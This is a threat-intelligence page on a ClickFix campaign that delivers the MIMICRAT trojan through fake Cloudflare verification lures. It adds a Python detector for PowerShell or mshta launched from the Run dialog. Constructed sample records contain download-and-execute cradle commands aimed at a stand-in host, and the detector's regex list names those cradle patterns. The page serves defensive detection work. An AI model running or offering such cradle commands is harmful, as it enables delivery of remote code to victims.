
ClickFix compromised-site MIMICRAT campaign

Type: Campaign
Happening score: 38
Sources: 1 unique source, 1 article

Summary


A ClickFix campaign is abusing compromised legitimate websites to deliver the MIMICRAT remote access trojan through a multi-stage infection chain, with lure pages localized in 17 languages and victims across multiple industries and geographies. The lure begins with a fake Cloudflare verification page and a copy-paste prompt that gets the victim to run a PowerShell command; the chain then bypasses ETW and AMSI and drops a Lua-based loader. The operation matters because the implant supports token manipulation, SOCKS5 tunneling, and other post-exploitation actions that can pave the way for ransomware deployment or data exfiltration.

Related Happenings

Secret Blizzard Kazuar modular P2P botnet

Malware Activity
First: 16.05.2026 17:15 Last: 16.05.2026 17:15 Sources: 1

About this happening: **Kazuar** is being used in a **multi-stage campaign in Ukraine** that ESET says likely involves **Gamaredon** providing access and **Turla/Secret Blizzard** delivering the backdo...

Hive0163 extortion and ransomware campaign using ClickFix and malvertising

Campaign
First: 12.03.2026 19:02 Last: 12.03.2026 19:02 Sources: 1

About this happening: Hive0163 is running an **active extortion and ransomware campaign** that expands access and raises the risk of **large-scale data exfiltration**. The operation uses **ClickFix**,...

Compromised legitimate WordPress websites used to infect visitors with infostealer malware; campaign expands across multiple victims

Campaign
First: 11.03.2026 16:45 Last: 11.03.2026 16:45 Sources: 1

About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

OAuth-phished ZIP/LNK/PowerShell malware delivery chain

Malware Activity
First: 03.03.2026 11:20 Last: 03.03.2026 11:20 Sources: 1

About this happening: **ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...

UAT-10027 U.S. education and healthcare targeting campaign

Campaign
First: 26.02.2026 17:17 Last: 26.02.2026 17:17 Sources: 1

About this happening: **UAT-10027** is running an active **campaign** against **U.S. education and healthcare organizations**, and the activity matters because it delivers a new backdoor and supporting...

Timeline

  1. 20.02.2026 13:55 · 2 articles

    ClickFix MIMICRAT campaign disclosed

    Initial Disclosure

    A ClickFix campaign abuses compromised legitimate sites to deliver the MIMICRAT (aka AstarionRAT) remote access trojan. The infection chain starts at bincheck[.]io, uses a fake Cloudflare verification page and a Windows Run dialog copy-paste lure, then runs PowerShell, bypasses ETW and AMSI, and drops a Lua-based loader that executes shellcode to deploy the implant. Victims span multiple geographies, including a US-based university and Chinese-speaking users, and the lure content is localized across 17 languages.

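The summary and the timeline entry above describe the same execution pattern: the victim pastes a command into the Windows Run dialog, so explorer.exe ends up as the parent of the resulting PowerShell (or cmd/mshta) process. The following is an added example, not code from this page, from the tracked reporting, or from any vendor: a small Python detector that scores constructed Sysmon-style process-creation records for that parent/child relationship together with common copy-paste cradle features (hidden window, encoded command, download-and-invoke). The record format, field names, indicator weights and threshold are assumptions made for illustration, and the sample records are constructed, not real telemetry.

```python
"""
Added example (not from the original page or the campaign's reporting):
score Sysmon-style process-creation records for the ClickFix Run-dialog
execution pattern. Field names, weights and threshold are assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed records in a 'Key=Value|Key=Value' layout modelled loosely on
# Sysmon Event ID 1. These are made up for the example, not captured telemetry.
SAMPLE_EVENTS = [
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -nop -c "iex (irm http://example.invalid/verify)"|User=CORP\jdoe',
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c start "" "C:\Users\jdoe\Documents\report.docx"|User=CORP\jdoe',
    r'ParentImage=C:\Program Files\Vendor\agent.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -NoProfile -File C:\ProgramData\Vendor\inventory.ps1|User=NT AUTHORITY\SYSTEM',
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta https://example.invalid/captcha.hta|User=CORP\asmith',
]

# Hosts a pasted Run-dialog command typically lands in.
CONSOLE_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Command-line features of copy-paste cradles. Weights are an assumption.
CMDLINE_INDICATORS = [
    (re.compile(r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), 2, "encoded command"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 2, "invoke-expression"),
    (re.compile(r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"), 2, "download cradle"),
    (re.compile(r"(?i)https?://"), 1, "remote URL"),
    (re.compile(r"(?i)(^|\s)-(nop|noprofile)\b"), 1, "no profile"),
]

# Assumption: explorer-parented console host (3) plus at least one cradle feature.
THRESHOLD = 4


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Split one 'Key=Value|Key=Value' record into a dict (first '=' wins)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def score_event(ev: dict) -> Verdict:
    """Score one parsed record; higher means more ClickFix-like."""
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = ev.get("CommandLine", "")
    verdict = Verdict()
    # The structural signal: a console host launched directly under explorer.exe,
    # which is what a command pasted into the Run dialog produces.
    if parent == "explorer.exe" and image in CONSOLE_HOSTS:
        verdict.score += 3
        verdict.reasons.append(f"{image} spawned by explorer.exe")
    for pattern, weight, label in CMDLINE_INDICATORS:
        if pattern.search(cmdline):
            verdict.score += weight
            verdict.reasons.append(label)
    return verdict


def find_clickfix_candidates(lines):
    """Return (user, verdict) pairs for records at or above THRESHOLD."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        verdict = score_event(ev)
        if verdict.score >= THRESHOLD:
            hits.append((ev.get("User"), verdict))
    return hits


if __name__ == "__main__":
    for user, verdict in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{user}: score={verdict.score} reasons={', '.join(verdict.reasons)}")
```

The explorer.exe-to-console-host relationship alone scores 3, which also covers a user legitimately typing cmd into Run (the second constructed record), so the threshold requires at least one command-line feature on top of it; the vendor agent running a scheduled script (third record) never reaches the structural signal at all. During an investigation the pasted command itself is usually recoverable from the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside process telemetry.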